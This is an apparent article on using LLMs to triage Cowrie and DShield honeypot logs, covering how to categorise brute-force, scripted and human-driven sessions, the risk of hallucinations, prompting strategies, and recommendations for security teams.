Optimizing Honeypot Log Analysis Using AI and LLM Orchestration

Analysis of AI-Assisted Telemetry Filtering

Threat intelligence teams frequently struggle with the sheer volume of telemetry generated by internet-facing sensors. Low-interaction honeypots, while valuable for identifying broad trends, often produce a high signal-to-noise ratio that requires significant manual effort to parse. According to research published by SANS Internet Storm Center (ISC), the application of Large Language Models (LLMs) can serve as a force multiplier in categorizing this data, specifically when dealing with Cowrie and DShield sensor logs.

The primary challenge in honeypot management is not the collection of data, but the extraction of actionable intelligence from thousands of daily connection attempts. Most of this traffic consists of automated ‘noise’—credential stuffing, mass scanning for known vulnerabilities, and script-kiddie activity. AI assistance provides a mechanism to rapidly distinguish between these automated baseline activities and more targeted, human-driven interactions.

Technical Implementation of Cowrie Log Parsing

Cowrie is a medium-interaction SSH and Telnet honeypot designed to log brute force attacks and shell interaction. When integrated with a DShield sensor, it captures a wealth of JSON-formatted log data. The AI-driven approach involves feeding structured logs into an LLM with specific system prompts designed to categorize the activity based on intent and sophistication.

During the research period, the analyst utilized the SANS.edu BACS program infrastructure to monitor ingress traffic. The AI was tasked with identifying:

• Automated Brute Force: Repeated login attempts using common dictionaries with no post-authentication interaction.
• Scripted Exploitation: Automated execution of specific commands (e.g., wget or curl) to download malware binaries or miners immediately upon successful login.
• Human-in-the-Loop Interaction: Unusual commands, exploratory directory traversal, or attempts to obfuscate activity that suggest a manual operator is interacting with the shell.

By automating the initial triage of these logs, analysts can prioritize the investigation of ‘human-like’ sessions, which often yield more valuable indicators of compromise (IOCs) or novel TTPs (Tactics, Techniques, and Procedures).

Challenges: Hallucinations and Prompt Engineering

While AI enhances efficiency, it introduces risks regarding data integrity. The SANS ISC report highlights the occurrence of ‘hallucinations,’ where the LLM may misinterpret hex-encoded payloads or invent connections between unrelated events. To mitigate this, prompt engineering must be rigorous. A ‘chain-of-thought’ prompting strategy—where the AI is instructed to explain its reasoning step-by-step before providing a final categorization—significantly improves the accuracy of the output.

Furthermore, the analyst found that context is vital. Providing the AI with a baseline of ‘normal’ malicious traffic allows it to better identify anomalies. For instance, if a sensor typically sees 5,000 attempts to download a Mirai variant daily, the AI should be tuned to alert only when it detects a deviation from that specific pattern, such as a different persistence mechanism or a novel evasion technique.

Recommendations for Security Teams

For organizations looking to implement AI-assisted log analysis, several strategic steps should be prioritized:

• Standardize Data Input: Ensure all honeypot telemetry is converted into a consistent JSON format before being processed. This reduces parsing errors within the LLM.
• Validation Loops: Implement a ‘Human-in-the-Loop’ (HITL) verification process for any activity flagged as ‘high-sophistication’ by the AI to confirm it is not a false positive or an LLM hallucination.
• Focus on Post-Auth Interaction: Configure honeypots to allow limited shell interaction. The most valuable intelligence comes from what an attacker does after they think they have gained access, rather than the initial brute-force attempt.
• Iterative Prompt Refinement: Regularly update the system prompts used for categorization to account for new trends in malware delivery and command-and-control (C2) communication styles.

In conclusion, while AI cannot replace the intuition of a senior threat analyst, it provides a critical layer of automated triage that makes large-scale honeypot operations sustainable for smaller security teams.